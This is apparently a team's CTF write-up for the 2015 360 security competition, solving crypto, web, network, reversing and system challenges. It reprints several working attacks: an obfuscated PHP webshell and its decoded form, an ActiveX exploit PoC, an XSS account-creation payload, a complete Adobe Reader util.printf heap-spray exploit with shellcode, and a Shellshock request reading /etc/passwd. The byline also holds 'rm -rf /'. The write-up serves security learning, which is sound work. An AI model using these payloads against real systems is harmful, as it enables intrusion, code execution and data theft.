Writeup for the 3rd 360 Information Security Competition


@[神秘代码rm -rf /|2015-06-07]

#### Crypto 10

Yuan-jie gave a hint: keyboard cipher. Trace each group of characters on the keyboard and the path draws a letter.

```text
BHUK,LP ------ N
TGBNHGYT --- B
UYGBN -------- C
```

#### Crypto 20

```php
<?php
eval(gzinflate(base64_decode("pZLdSsNAEIXvBd+hTmOzMXTbFC3UGhtFEANWlLZES5OgvauoIFho2jy7s7PJhMSIF5Kbb2fPzs+Z7O8ZiYAmhLAFS9bQzhUQIboUPECKiUQDMSFMkYZIZt+U5nFkYijB0Kh0KfCcp+5wlh+6YaO2H9VFbW2BNK8U2iJJoiOk9Pek4q/ZBTwG481T4HeD3mC9vH79en67fb+fjScPM38aOMvL6erEn6xePm+uLj7u1i669I9qAucL4ZSDesQWC9WwHlGxkZRpwW9t1ikrDCRwAE87dtvm7EphlRQd3taC6AwpIjJ4A4XFkhcQ81uhbZcw6EN20a67mHPHxX8Qc+YQP7vyvxQJIHNBa9usUBMcck5d1kNqEVmZl9CDkmNNnsLIFV3IKnsVRT4OOCQJdRNq76Pzbw==")));
?>
```

It is a PHP shell. It looks complicated but is not actually hard: echo the result of each step in turn, and substitute each string-concatenation result back into the code. It ends up roughly like this:

```php
<?php
$___ = 'base64_decode';
$__ = 'assert';
// decodes to: assert_options(ASSERT_WARNING, 0);  (silences assert warnings)
$__($___("YXNzZXJ0X29wdGlvbnMoQVNTRVJUX1dBUk5JTkcsIDApOw=="));
// decodes to: eval($_POST[p4n9_z1_zh3n9_j1u_Sh1_J13])  (the actual one-liner shell)
$__($___('ZXZhbCgkX1BPU1RbcDRuOV96MV96aDNuOV9qMXVfU2gxX0oxM10p'));
?>
```

Decoding the base64 finally yields a one-liner webshell, **eval($_POST[p4n9_z1_zh3n9_j1u_Sh1_J13])**; the flag is the webshell password.
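For analysing shells packed like this one, here is an added Python unwrapper (my own example, not code from the writeup) that peels `eval(gzinflate(base64_decode(...)))` layers until plain PHP is left. The sample it runs on is constructed inline by wrapping a harmless marker twice; it is not the challenge's blob.

```python
import base64
import re
import zlib

# Matches one wrapper layer of the form eval(gzinflate(base64_decode("...")))
LAYER_RE = re.compile(
    r'eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)\s*\)'
)


def unwrap_layers(php_source, max_layers=32):
    """Peel eval(gzinflate(base64_decode(...))) wrappers until none remain.

    Returns (final_source, layers_removed). PHP's gzinflate() is raw DEFLATE,
    which in Python is zlib.decompress with wbits=-15.
    """
    current = php_source
    for n in range(max_layers):
        m = LAYER_RE.search(current)
        if not m:
            return current, n
        raw = zlib.decompress(base64.b64decode(m.group(1)), -15)
        current = raw.decode('latin-1')
    raise ValueError('too many layers; refusing to continue')


def wrap_layer(php_code):
    """Constructed helper: builds one wrapper layer, only to produce a sample to test on."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    deflated = comp.compress(php_code.encode('latin-1')) + comp.flush()
    return '<?php eval(gzinflate(base64_decode("%s"))); ?>' % base64.b64encode(deflated).decode()


# Constructed sample: a harmless marker wrapped twice, mimicking the challenge's nesting.
INNER = "echo 'inner';"
SAMPLE = wrap_layer(wrap_layer(INNER))

if __name__ == '__main__':
    source, layers = unwrap_layers(SAMPLE)
    print('layers removed: %d' % layers)
    print(source)
```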

#### Crypto 40

A base64 string that is entirely upper case, so the guess is that it only takes brute-forcing the letter case. Solved with a script.

```python
import base64
import itertools

# The all-uppercase string: NTU2NJC3ODHHYWJIZ3P4ZWY=
# Each chunk lists the casings tried for that position (digits, '=' and some
# letters are left untouched, exactly as in the original brute force).
chunks = [
    ['N', 'n'], ['T', 't'], ['U', 'u'], ['2N', '2n'], ['J', 'j'], ['C3O', 'c3O'],
    ['D', 'd'], ['H', 'h'], ['H', 'h'], ['Y', 'y'], ['W', 'w'], ['J', 'j'],
    ['I', 'i'], ['Z', 'z'], ['3P4', '3p4'], ['Z', 'z'], ['W', 'w'], ['Y=', 'y='],
]

# itertools.product replaces the 18 nested for loops of the original script
for combo in itertools.product(*chunks):
    candidate = ''.join(combo)
    decoded = base64.b64decode(candidate)
    # keep only decodings made entirely of printable, non-space ASCII (0x21..0x7e)
    if all(33 <= byte <= 126 for byte in decoded):
        print(candidate, decoded.decode('ascii'))
```

The code is ugly, but it works.
Try the candidates one by one and you eventually get the flag.

#### Network Protocols 20

The PoC is recovered from the packet capture:

```html
<html>
<body>
<object id="mfHQh" classid="clsid:5C2A52BD-2250-4F6B-A4D2-D1D00FCD748C">
<script type="text/javascript">
mfHQh[(unescape(String.fromCharCode((67E0000>>(0>>((0)>>(0)))), 114, (101), ((58914458, 85)+parseInt("110", 3)), (("cGyfp"<289)?("Fy"):11.6e+0001), (202>>(("BfbZkWS"==327)?unescape("lxt"):1)), 80))+(942).toString(34e00)+((12).toString(34)+(14).toString(34E00000)+"s"+(28).toString(((29E+00000<<("OTUpu", 44064652, "Qd", "eRA", "fEgAwtJ", 9362486, 675682, "LLxSXd", 0))<<(0)))))](unescape((("iYbgcQD"<="ZDJbgwjxH")?(981<<(-~-0-1)):(("wVJTgSZum"!=73171390)?String.fromCharCode(99E0000, ((74>>(-~1-1))<<(("qInlSEQAC"!=1971649)?0:715912)), (51E+00000<<0), (((1023==22)?27051:(-~65-1))<<(0>>0)), parseInt("25", 16), ((((~~53)>>(0)))^(-1)+1), ((67E+000<<0)<<0), (~~(~~11.9E+001)), 105E+00000, ("", unescape("OnY"), 110), (((49662263==963834)?"EvBDfGnk":223)-(123>>(0))), (-~11.1E1-1), (((119)^(-1)+1)<<parseInt("0", 2)), ((115<<((0)>>(0)))>>((0)>>(0))), 37, (-~(("qIGAZWko", 53)<<(0))-1), 67e+00, ((959854528>="VUsUeDs")?"GfR".split("").reverse().join(""):101), ((-~((1<<6)+56)-1)<<(656218, 0)), (448>>("knoVd", "", 2)), ((267>>(0))-(-(-159))), ((444>>2)>>(0)), (("UtmHWsEw"!=825704629)?(456e00>>(1<<1)):unescape("Ip")), 101, ((57E00<<0)<<1), (-~((92>>(0))>>(178263, 6994229, 1))-1), (-~101-1), (~~12.0E001), (-(-(~~(("ZmSlaRt"<2448443)?"SIhD":101)))), 32, (((((37>>(0)))^(-1)+1))^(-1)+1), ((53E0000>>0)>>0), ((("icuMppvs"<897081)?45063:((3295257<67659)?957:67))<<0), (-(-(-~37-1))), (((70025<="cJecgz")?"MPLoegx":(-34))+(174>>1)), 67, (49e+00<<parseInt("1", 15)), ((13<<1)+(42975201, "ymv", "", "", 93)), (236>>(("TgKX"<29845901)?454:((3190<="MQfOBSc")?"Dmjel":1))), (98), 112, ("zyEZT".split("").reverse().join(""), 682149, 114), (((232)>>((49>"qBaCavK")?83:1))<<(-~-0-1)), (46), ((351!=82)?10.1E00001:parseInt("24259", 26)), ((48.0E01>>(1<<1))>>((-(("oA"<"Sr")?"onxYT":(0)))^(-1)+1)), (101)):(String.fromCharCode((("jDwp", 109)<<(0)))+"q"+"i")))),0,(((-(-(String.fromCharCode(((1208>="VvPPHwIKa")?353:106), ((4246239<"BtojuE")?309609:70)), parseInt("1610455013", 7), 1)))>>0)>>0));
</script>
</body>
</html>
```

Googling
clsid:5C2A52BD-2250-4F6B-A4D2-D1D00FCD748C
shows that this CLSID appears in PoCs for the Broadwin WebAccess product, which has since been renamed Advantech WebAccess, so go to
http://cve.scap.org.cn/cve_list.php?keyword=BroadWin%20WebAccess&action=search&log=1&p=1
http://cve.scap.org.cn/cve_list.php?keyword=Advantech%20Webaccess&action=search&log=1&p=1

There are 56 CVEs in total, and there is no limit on the number of flag submissions, so try them by hand. The answer turns out to be the last entry on page four of the Advantech WebAccess list, CVE-2014-0773.

#### Network Protocols 80

There are many pcaps. Pick one and run strings over it first. The task says the value to submit is the mobile device's International Mobile Equipment Identity (IMEI), but searching for the keyword imei finds nothing.


There is a udId field, which is presumably the code we want, so extract every udId.


There are duplicates; after deduplicating, analyse them. The task asks for the IMEI of the mobile devices that use the same virtual identity, so the guess is that entries with the same username or password may share a virtual identity. One pair with identical passwords turns up, with udId values 353627055435880 and 352315050191630; submitting 353627055435880 is correct.
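The deduplicate-and-group step above, as an added Python example that is not part of the writeup. It runs over a few constructed request lines of the kind strings would print; the URL layout, usernames and passwords are assumptions, and only the two udId values come from the writeup.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample request lines (assumed layout); the udId values are the two
# from the writeup, the usernames and passwords are made up.
SAMPLE_LINES = """\
GET /api/login?udId=353627055435880&user=alice&pass=p%40ss01 HTTP/1.1
GET /api/login?udId=353627055435880&user=alice&pass=p%40ss01 HTTP/1.1
GET /api/login?udId=352315050191630&user=bob&pass=p%40ss01 HTTP/1.1
GET /api/login?udId=860000000000001&user=carol&pass=other HTTP/1.1
GET /index.html HTTP/1.1
""".splitlines()

REQUEST_RE = re.compile(r'^(?:GET|POST)\s+(\S+)\s+HTTP/')


def extract_records(lines):
    """Return the de-duplicated set of (udId, user, pass) tuples found in request lines."""
    records = set()
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        qs = parse_qs(urlsplit(m.group(1)).query)
        if 'udId' not in qs:
            continue
        records.add((qs['udId'][0], qs.get('user', [''])[0], qs.get('pass', [''])[0]))
    return records


def shared_identity_groups(records):
    """Group udIds by credential (user or password); keep only groups with >1 device."""
    by_pass = defaultdict(set)
    by_user = defaultdict(set)
    for udid, user, pw in records:
        by_pass[pw].add(udid)
        by_user[user].add(udid)
    groups = {('pass', k): sorted(v) for k, v in by_pass.items() if len(v) > 1}
    groups.update({('user', k): sorted(v) for k, v in by_user.items() if len(v) > 1})
    return groups


if __name__ == '__main__':
    for key, udids in shared_identity_groups(extract_records(SAMPLE_LINES)).items():
        print('same %s %r: %s' % (key[0], key[1], ', '.join(udids)))
```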


#### Web Security 10

Open the image in c32; there is a base64 string at the end of the file. Decoding it gives ctf_360_flag, which by itself leads nowhere. Later Xiaoshuidi hinted at a file left behind by macOS. Visiting
http://isg.campus.360.cn/web1/ctf_360_flag/.DC_Store
gives the flag.

#### Web Security 20

Password recovery. With F12 the recovery email address can be changed, and there is a send action whose response contains a code, presumably the verification code, but submitting it goes nowhere. A hint says that a .swp temporary file leaks the source, and that the source contains commented-out parts of check.php, which yields part of check.php's code. Searching turns up ph牛 (phith0n)'s https://www.leavesongs.com/PENETRATION/findpwd-funny-logic-vul.html
so set code to 000000000a, which successfully returns the flag.

#### Web Security 30

Open the image in c32; at the end there is a string of ASCII characters:

```text
--.  ..  ..-.  ---..  ----.  .-  ;..<..--..  .--.  ....  .--.   $.-   = "-----  .-.-.-  .----  ";$-...   = $_--.  .  -  [.----.  -...  .----.  ];..  ..-.  ($-...   -.-.--  = .----.  .----.  ){    ..  ..-.   (..  ...  _.-  .-.  .-.  .-  -.--  ($-...  )){        .  -.-.  ....  ---   "-.  ---   -.-  .  -.--  -.-.--  ";        .  -..-  ..  -  ;    }.  .-..  ...  .  ..  ..-.  (-.-.--  ..  ...  _-.  ..-  --  .  .-.  ..  -.-.  ($-...  )){       $-.-.   = (..  -.  -  )(($.-   + $-...  ) * .----  -----  );        ..  ..-.   ($-.-.   == "---..  " && $-...  [.----  -----  ] == ..-.  .-  .-..  ...  .  ){            .  -.-.  ....  ---   "..-.  .-..  .-  --.  ";        }.  .-..  ...  .  {            .  -.-.  ....  ---   "-.  ---   -.-  .  -.--  -.-.--  ";            .  -..-  ..  -  ;        }    }.  .-..  ...  .  {        .  -.-.  ....  ---   "-.  ---   -.-  .  -.--  -.-.--  ";    }}.  .-..  ...  .  {    .  -.-.  ....  ---   "-.  ---   -.-  .  -.--  -.-.--  ";}..--..  >
```

It looks a lot like PHP code, and it also looks like Morse code. Decoding the Morse yields the PHP code:

```php
<?php
$a = "0.1";
$b = $_GET['b'];   // the decoded Morse reads $_GET, not $get
if ($b != '') {
    if (is_array($b)) {
        echo "NOKEY?";
        exit;
    } elseif (!is_numeric($b)) {
        // the FLAG branch is only reachable with a non-numeric b
        $c = (int)(($a + $b) * 10);
        if ($c == "8" && $b[10] == false) {
            echo "FLAG";
        } else {
            echo "NOKEY? ";
            exit;
        }
    } else {
        echo "NOKEY?";
    }
} else {
    echo "NOKEY?";
}
?>
```

A simple PHP bypass trick: is_numeric rejects the trailing letter, but PHP's arithmetic still uses the numeric prefix 0.71, so (int)((0.1 + 0.71) * 10) is 8, and $b[10] lies past the end of the 7-character string, so it reads as an empty string and compares equal to false. Visit isg.campus.360.cn/web3?b=0.71e0a directly
and you get the flag.
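To see why 0.71e0a passes and ordinary numeric input does not, here is an added Python model of PHP 5's string handling in the check above (my own example, not part of the writeup; it only approximates PHP's conversion rules for the cases the check exercises).

```python
import re

# PHP's leading-number rule for arithmetic on strings: use the longest numeric
# prefix (optional sign, digits, optional fraction, optional exponent), else 0.
_NUM_PREFIX = re.compile(r'^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?')


def php_to_number(s):
    """Model of PHP 5 string-to-number conversion as used by the + operator."""
    m = _NUM_PREFIX.match(s)
    if not m:
        return 0
    text = m.group(0).strip()
    return float(text) if any(c in text for c in '.eE') else int(text)


def php_is_numeric(s):
    """Model of is_numeric(): the whole string must be a number (leading whitespace allowed)."""
    m = _NUM_PREFIX.match(s)
    return m is not None and m.end() == len(s)


def php_char_at(s, i):
    """Reading past the end of a PHP string yields "" (with a notice)."""
    return s[i] if i < len(s) else ''


def check(b):
    """Python model of the challenge's check for the b parameter (a string or a list)."""
    a = "0.1"
    if b == '':
        return "NOKEY?"
    if isinstance(b, list):          # is_array($b)
        return "NOKEY?"
    if php_is_numeric(b):            # numeric input never reaches the flag branch
        return "NOKEY?"
    c = int((php_to_number(a) + php_to_number(b)) * 10)   # (int)(($a + $b) * 10)
    # $c == "8" compares numerically; "" == false and "0" == false are both true in PHP
    if c == 8 and php_char_at(b, 10) in ('', '0'):
        return "FLAG"
    return "NOKEY?"


if __name__ == '__main__':
    for b in ("0.71e0a", "0.7", "abc", "0.7a"):
        print('%-8r -> %s' % (b, check(b)))
```

Note that 0.7a fails even though 0.1 + 0.7 looks like 0.8: the floating-point sum is 0.7999999999999999, and the (int) cast truncates 7.999999999999999 to 7, which is why the challenge value was chosen to land clearly above 8.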

#### Web Security 160

It is a login form, which at first looked like an injection point, but attempts went nowhere. The hint says that brute-forcing is logged by the back end, which suggested the IP could be spoofed and then XSS?
After a few manual tries it turned out that the XSS is actually in the account field.


As shown in the screenshot.
The cookie, however, cannot be used for impersonation.
In the end, use XHR to fetch the page's source.
Reading the page source reveals an add-account interface,
so call that interface with XHR to add an account:

```javascript
// payload placed in the account field: call the add-account interface found in the page source
var xhr = window.XMLHttpRequest ? new XMLHttpRequest() : window.ActiveXObject ? new ActiveXObject("Microsoft.XMLHTTP") : new XMLHttpRequest();
xhr.open("POST", "/web5/adduser", true);
xhr.send("name=th1nk&pass=th1nk111&submit=ok");
```

Log in with username th1nk and password th1nk111; once logged in, the flag is shown.

#### Reverse Engineering 80

PDFStreamDumper identifies the vulnerability number:

```text
Exploit CVE-2008-2992 Date:11.4.08 v8.1.2 - util.printf - found in stream: 6
```

Extract the PoC:

```javascript
// shellcode
var FPjQCsjtdonfxZpbyesDvmeaJODjYqwSRZaNVxBbHKwQPiKwAHsrLOIDlFsDoMExuKqqqiARD = unescape("%u0de1%ua8ba%u9fb9%ue08c%u4978%ub3bb%ufd69%ue310%u3735%ubfb2%u1415%u1c77%ud683%ufc0a%u6b27%ud4d0%u6797%ub62c%ud50b%u4f2d%u0c4b%u98b0%u3f1d%u4647%u8d43%u3499%u41be%u727a%ud303%ue0d1%u7874%u0477%ub893%u8790%uc1c7%u73e1%u4871%u8db3%u759f%u1c7f%u9bb9%u924f%u9634%u2593%u2db7%u3770%u11a9%u7ad6%u4249%u27be%ufd18%u15b0%u247d%u2cbb%uf533%ub697%u467e%u4e79%u7c43%u4a76%u900c%uf888%u05ba%ub499%u1491%u1d98%u0d3d%ufc2a%u7ba8%ud43b%u3c40%u20b8%u2fe3%u6641%ueb86%u043f%u80bf%u35d5%ub2b1%uf923%u4b67%u47b5%ue229%u7672%u4f7a%u09b4%u70eb%u6775%u05b0%u347f%uf785%u3fe1%u3827%uc0ff%u39f9%u30fc%u74e0%u1215%u24d5%u9f41%u257c%u910c%u488d%u78be%ue322%ud621%ua949%u2cb9%u81a8%ub6f8%u464a%ub5b2%u6697%u3cbb%u9042%ub392%ub804%u354b%u9914%ub71d%u2f47%u7e79%u960d%u2b43%u40fd%u772d%u1a7b%u02e2%ubad4%u7193%u1c73%u379b%ubf98%u7db1%u4e3d%uf51b%ud208%u7ae2%u7f75%u7c7b%u4373%ue184%u2d70%u9296%u0c99%u3a42%u66f9%u7e4b%u741d%ud131%u20eb%u3bf5%ua8fd%u1148%uc6fe%ud5c0%u7298%uf70b%u71e0%u7876%u7949%ub314%ub4b2%u4024%u89b7%u15f8%ub0bf%u8d41%u049f%ube0d%ub6a9%ud63a%u03b5%ub8fc%ue319%u7d77%u023c%ub1d4%ubb37%u3f34%u1c46%u9767%u3d4e%u4f93%u252f%u2791%ub935%u9b2c%u4a47%u9005%u88ba%u7ce3%u3875%u73d4%u9824%ub3b7%ue086%ub64e%ubb27%ub514%u71a8%ua94a%u0c7a%ufd1b%u709b%ue239%u9205%u7f4b%u2d1d%u72b0%u673c%u74bf%u3d78%u419f%u9735%u762f%u4347%u4f66%ud585%u91b9%u8d48%ub442%ueb22%u3f1c%u2577%ud613%u407e%u9099%uf52a%u04b8%ubeb1%ub246%u7dba%u340d%u7937%u9315%u0a96%u7bfc%u8749%u83f9%u2ce1%uf832%u717c%u7f7d%u9f3f%ube04%ub9b4%uc118%u7ee2%u9627%u2378%u70d4%ud06b%u73f8%u3175%u4fe0%u7691%ub335%u30bb%u8dfc%u3d72%u66bf%u9937%u3c92%uf92b%u4e05%u7ab1%u417b%ua847%u2cb8%u2443%u90b6%u4b9b%ub2a9%u3442%u4874%u6914%u28fd%u40e3%ue121%u671c%uba49%ud28c%uebd3%u840d%ub5f5%ub0b7%u1a77%u98d6%u7993%u7346%u7825%ue301%u772d%u7515%u971d%ud580%u4a7f%u0c74%u2f71%u76b6%ud612%u7b91%u793d%u3f47%u3c7e%u417d%u7aba%ue110%u6734%u0d7c%u8db3%u70bf%ue209%u811d%u24eb%u93be%u05e0%uf598%ubb96%u72a8%u350c%u0448%u9f97%u4643%ub0fd%u292d%ud5f6%ub5d4%u4eb9%u2f92%u9b4a%u4fb4%u3366%ub8f8%u49a9%u272c%ub24b%u99b1%u421c%ub737%u4015%u2514%uf908%ufc90%ueebe%u28ba%ud9b3%ud9cf%u2474%u58f4%uc931%u4db1%u7031%u8315%ufce8%u7003%ue211%u631b%u28c3%ue03a%ubb30%udb8d%u348b%u12dc%u318f%u956f%u30db%u5e83%ua0ad%u2610%u525a%u8758%u52d1%u889c%ueffd%u4f2f%udeff%u9130%u6b9f%u76a2%ue744%u4b7f%ua30f%ucb57%ua60e%u612c%ubd09%u5668%u2a28%ua26f%u2763%u405b%ud972%ua992%ue544%uf928%u2523%u05a4%u69ed%u0b49%u9e2a%u30a5%u45c8%u326d%u0dd1%u9837%uf910%u6ba1%ub61e%u36a6%u4903%u4d53%uc23f%ubaa2%u90c9%u2680%udbab%u5e7a%u0802%ubaf3%u72dd%ucb6b%u7c90%u8187%u1ec4%ud9a8%ua8ea%u2213%ud5ae%uc843%uaea3%u296f%u5916%uce01%u6669%u7494%uf19e%u1aca%u40be%ud07a%u6c8c%u7e1e%u0384%u0cbb%u3f56%uadcb%ub5b2%uab42%u36ed%u3001%u0b9b%u83f9%u2933%u4fb4%u32c4%ue262%u1523%ufd95%uc24b%u6c06%u33ec%u1cb0%u406d%ub529%uc91f%u30dd%u4a88%ud572%u7c2f%ua157%u5aec%u3b69%ucbef%u6345%u2bd0%ua5cd%u4d21%ua268%ub525%u0211%uf3ce%u5ae7%u946d%uae3f%u0648%ue957%ufec8%u619f%u9b35%u46ed%u5b2d%ucd73%uf394%u3d2c%u3385%u1dba%u5b30%u364f%uc6a9%ufcd6%uc01c%u4da0%ufb7b%uac39%u29b2%u7c6b%u9fe4%u5274%ue037%uacda%ue86d");
// padding prepended to the shellcode
var zYKJFPGhDPdJyrbAxRpcQfDImAPIplsgOzCCcIqxADQEwmGLZRS ="";
for (iQVeXTShSXwvQktjtpkoUTHbmcLIqFtOcJvMMfOdAQqZfCLlaHyzLUV=128;iQVeXTShSXwvQktjtpkoUTHbmcLIqFtOcJvMMfOdAQqZfCLlaHyzLUV>=0;--iQVeXTShSXwvQktjtpkoUTHbmcLIqFtOcJvMMfOdAQqZfCLlaHyzLUV) zYKJFPGhDPdJyrbAxRpcQfDImAPIplsgOzCCcIqxADQEwmGLZRS += unescape("%ub14f%u47b6");
bUQrgSIqvBTMIcSVloEgDsmSFJKzNOOhLayThJddFfMEEsvjJrEqQAHOfcPusGgNnZGszHFXQKezzaUxnaXtoyfluqBJddjV = zYKJFPGhDPdJyrbAxRpcQfDImAPIplsgOzCCcIqxADQEwmGLZRS + FPjQCsjtdonfxZpbyesDvmeaJODjYqwSRZaNVxBbHKwQPiKwAHsrLOIDlFsDoMExuKqqqiARD;
// build the 0x40000-byte spray blocks
CnPTbiKLEkFFfKJjHhPQucfuMGjCOvAAIGtNjGtXTnZoOJtTZlMYKDofZpRcNBdxCIypFgKFVghIJdqUHmZEpgUHsMK = unescape("%ub14f%u47b6");
TLaqiOXLRiPnHZKwUfoXkIOROzZFxsumuRRjbxWStcJBZuwdvhflKZKtOtoZQcDNeffLmbdnBgOSdAYCXv = 20;
ECRRsmroCTdUbKec = TLaqiOXLRiPnHZKwUfoXkIOROzZFxsumuRRjbxWStcJBZuwdvhflKZKtOtoZQcDNeffLmbdnBgOSdAYCXv+bUQrgSIqvBTMIcSVloEgDsmSFJKzNOOhLayThJddFfMEEsvjJrEqQAHOfcPusGgNnZGszHFXQKezzaUxnaXtoyfluqBJddjV.length
while (CnPTbiKLEkFFfKJjHhPQucfuMGjCOvAAIGtNjGtXTnZoOJtTZlMYKDofZpRcNBdxCIypFgKFVghIJdqUHmZEpgUHsMK.length<ECRRsmroCTdUbKec) CnPTbiKLEkFFfKJjHhPQucfuMGjCOvAAIGtNjGtXTnZoOJtTZlMYKDofZpRcNBdxCIypFgKFVghIJdqUHmZEpgUHsMK+=CnPTbiKLEkFFfKJjHhPQucfuMGjCOvAAIGtNjGtXTnZoOJtTZlMYKDofZpRcNBdxCIypFgKFVghIJdqUHmZEpgUHsMK;
ssmVTFzQhXCzpRQWatxEl = CnPTbiKLEkFFfKJjHhPQucfuMGjCOvAAIGtNjGtXTnZoOJtTZlMYKDofZpRcNBdxCIypFgKFVghIJdqUHmZEpgUHsMK.substring(0, ECRRsmroCTdUbKec);
yruXtuLATsVgRHfINgmhqtLRsIsaTkOVZcFnuaBhLpfmiLOZuLHjIBOFTikLVcTswjqLQQkqpYWtktNuhdHNuKjFgjCqNTYGG = CnPTbiKLEkFFfKJjHhPQucfuMGjCOvAAIGtNjGtXTnZoOJtTZlMYKDofZpRcNBdxCIypFgKFVghIJdqUHmZEpgUHsMK.substring(0, CnPTbiKLEkFFfKJjHhPQucfuMGjCOvAAIGtNjGtXTnZoOJtTZlMYKDofZpRcNBdxCIypFgKFVghIJdqUHmZEpgUHsMK.length-ECRRsmroCTdUbKec);
while(yruXtuLATsVgRHfINgmhqtLRsIsaTkOVZcFnuaBhLpfmiLOZuLHjIBOFTikLVcTswjqLQQkqpYWtktNuhdHNuKjFgjCqNTYGG.length+ECRRsmroCTdUbKec < 0x40000) yruXtuLATsVgRHfINgmhqtLRsIsaTkOVZcFnuaBhLpfmiLOZuLHjIBOFTikLVcTswjqLQQkqpYWtktNuhdHNuKjFgjCqNTYGG = yruXtuLATsVgRHfINgmhqtLRsIsaTkOVZcFnuaBhLpfmiLOZuLHjIBOFTikLVcTswjqLQQkqpYWtktNuhdHNuKjFgjCqNTYGG+yruXtuLATsVgRHfINgmhqtLRsIsaTkOVZcFnuaBhLpfmiLOZuLHjIBOFTikLVcTswjqLQQkqpYWtktNuhdHNuKjFgjCqNTYGG+ssmVTFzQhXCzpRQWatxEl;
// heap spray: 1450 copies
B = new Array();
for (OtqwAabDCukgckmkSsszrelXkzTzqQiYcGawWOSrHkbxyUmuNOccVEOGVPDNTeCpKjkPCAfdtpIDAnzhVANxiGYHeVAFqIIhm=0;OtqwAabDCukgckmkSsszrelXkzTzqQiYcGawWOSrHkbxyUmuNOccVEOGVPDNTeCpKjkPCAfdtpIDAnzhVANxiGYHeVAFqIIhm<1450;OtqwAabDCukgckmkSsszrelXkzTzqQiYcGawWOSrHkbxyUmuNOccVEOGVPDNTeCpKjkPCAfdtpIDAnzhVANxiGYHeVAFqIIhm++) B[OtqwAabDCukgckmkSsszrelXkzTzqQiYcGawWOSrHkbxyUmuNOccVEOGVPDNTeCpKjkPCAfdtpIDAnzhVANxiGYHeVAFqIIhm] = yruXtuLATsVgRHfINgmhqtLRsIsaTkOVZcFnuaBhLpfmiLOZuLHjIBOFTikLVcTswjqLQQkqpYWtktNuhdHNuKjFgjCqNTYGG + bUQrgSIqvBTMIcSVloEgDsmSFJKzNOOhLayThJddFfMEEsvjJrEqQAHOfcPusGgNnZGszHFXQKezzaUxnaXtoyfluqBJddjV;
// trigger: the util.printf format-string bug (CVE-2008-2992)
util.printf("%45000.45000f", 0);
```

Download version 8.1.2 (Adobe Reader) and run it.

#### System Security 10

```text
// parser calls as reversed from the binary, interleaved with the packet bytes p that each one consumes
get_asn_header('0');
p = "\x30\x22"
get_object((char *)&version, 2);
p += "\x02\x01"
if ( version == 2 )
p += "\x02"
get_object(community_name, 4); // overflow community_name
p += "\x04\xff" + "\x00"*24
p += "\x41\x0a\x41\x40\x00"
```

#### System Security 20

Construct the following request in Burp:

```http
GET /os2 HTTP/1.1
Host: isg.campus.360.cn
User-Agent: () { :;}; echo \$(</etc/passwd)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://isg.campus.360.cn/
Cookie: __guid=67796994.1202642768474584600.1433121630729.481; PHPSESSID=ne9d10moabsrh9uh5h1o5qvuo7
Connection: keep-alive
```


© 2014 ::L Team::